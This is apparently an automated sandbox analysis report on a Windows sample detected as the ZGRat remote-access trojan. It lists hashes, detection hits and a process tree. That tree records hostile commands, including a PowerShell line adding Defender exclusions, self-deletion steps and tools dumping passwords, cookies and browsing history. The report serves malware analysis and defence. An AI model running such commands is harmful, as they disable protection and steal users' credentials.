Analysis
-
max time kernel
6s -
max time network
112s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
26-12-2023 11:42
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
6bb1fc39a710a20d4bd7779731e0a972.exe
Resource
win7-20231215-en
windows7-x64
8 signatures
150 seconds
General
-
Target
6bb1fc39a710a20d4bd7779731e0a972.exe
-
Size
12.7MB
-
MD5
6bb1fc39a710a20d4bd7779731e0a972
-
SHA1
12b64c61fe8208acef248ec8e29fdad3bbf90758
-
SHA256
ed1d9fc091189331d57eba3193aa865680c155c2f1d846ca8a408c70edda8e8d
-
SHA512
6b4b2dd220cd376d9117dd88cb4ceb406148c1cbb42dfa3955d68e33c38e29021f03ff64887b3b4877fe8158a5a63140ba8f9247274f607ccaa54b79225c9b96
-
SSDEEP
49152:lD6jEjcV5chDISveiY6gDosgTsraT8q7u7jhQFjlRYHK8t54cZ1kZccahMPonhzM:pTOeuLFGiJ3P0
Malware Config
Signatures
-
Detect ZGRat V1 34 IoCs
resource yara_rule behavioral2/memory/3036-66-0x000000001BFF0000-0x000000001C33C000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-68-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-72-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-74-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-78-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-82-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-84-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-88-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-92-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-96-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-98-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-102-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-106-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-108-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-112-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-114-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-118-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-120-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-126-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-128-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-130-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-124-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-122-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-116-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-110-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-104-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-100-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-94-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-90-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-86-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-80-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-76-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-70-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 behavioral2/memory/3036-67-0x000000001BFF0000-0x000000001C335000-memory.dmp family_zgrat_v1 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 4 IoCs
pid Process 1564 PING.EXE 4464 PING.EXE 3220 PING.EXE 1836 PING.EXE
Processes
-
C:\Users\Admin\AppData\Local\Temp\6bb1fc39a710a20d4bd7779731e0a972.exe"C:\Users\Admin\AppData\Local\Temp\6bb1fc39a710a20d4bd7779731e0a972.exe"1⤵PID:3036
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com2⤵PID:1444
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com3⤵
- Runs ping.exe
PID:3220
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com2⤵PID:4868
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com3⤵
- Runs ping.exe
PID:1836
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com2⤵PID:1008
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com3⤵
- Runs ping.exe
PID:1564
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com2⤵PID:2328
-
C:\Windows\system32\PING.EXE"C:\Windows\system32\PING.EXE" gooogle.com3⤵
- Runs ping.exe
PID:4464
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Llklnklaprkhrsl.vbs"2⤵PID:2208
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Service.exe'3⤵PID:4520
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Llklnklaprkhrsl.vbs"2⤵PID:1452
-
C:\Users\Admin\AppData\Local\Temp\Mxgobydrqfcbuilder.exe"C:\Users\Admin\AppData\Local\Temp\Mxgobydrqfcbuilder.exe"3⤵PID:2500
-
-
-
C:\Users\Admin\AppData\Local\Temp\InstallUtil.exeC:\Users\Admin\AppData\Local\Temp\InstallUtil.exe2⤵PID:1100
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /K & exit3⤵PID:4584
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 5; Remove-Item -Path "C:\Users\Admin\AppData\Local\Temp\6bb1fc39a710a20d4bd7779731e0a972.exe" -Force2⤵PID:1828
-
-
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs6gQIB1aBuML/fMO8V+2SXQV2mwc0TaphiLYZaGWfUOi1WgGrrwfZsljwvBFt3P08D1H1gG93wNGvKMabHAjxu5IhiDr06lM3ChIuVZWIt+7Hm/EI9RPxL7nfe1gorT7Mc=1⤵PID:3604
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"2⤵PID:4936
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat3⤵PID:464
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exeC:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"4⤵PID:2768
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"2⤵PID:1604
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat3⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exeC:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"4⤵PID:3736
-
-
C:\Users\Admin\AppData\Local\Temp\splwow64.exeC:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"4⤵PID:4444
-
-
C:\Users\Admin\AppData\Local\Temp\hh.exeC:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"4⤵PID:4344
-
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"2⤵PID:4108
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat3⤵PID:3476
-
C:\Users\Admin\AppData\Local\Temp\xwizard.exeC:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"4⤵PID:228
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"2⤵PID:1688
-
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 31⤵PID:3036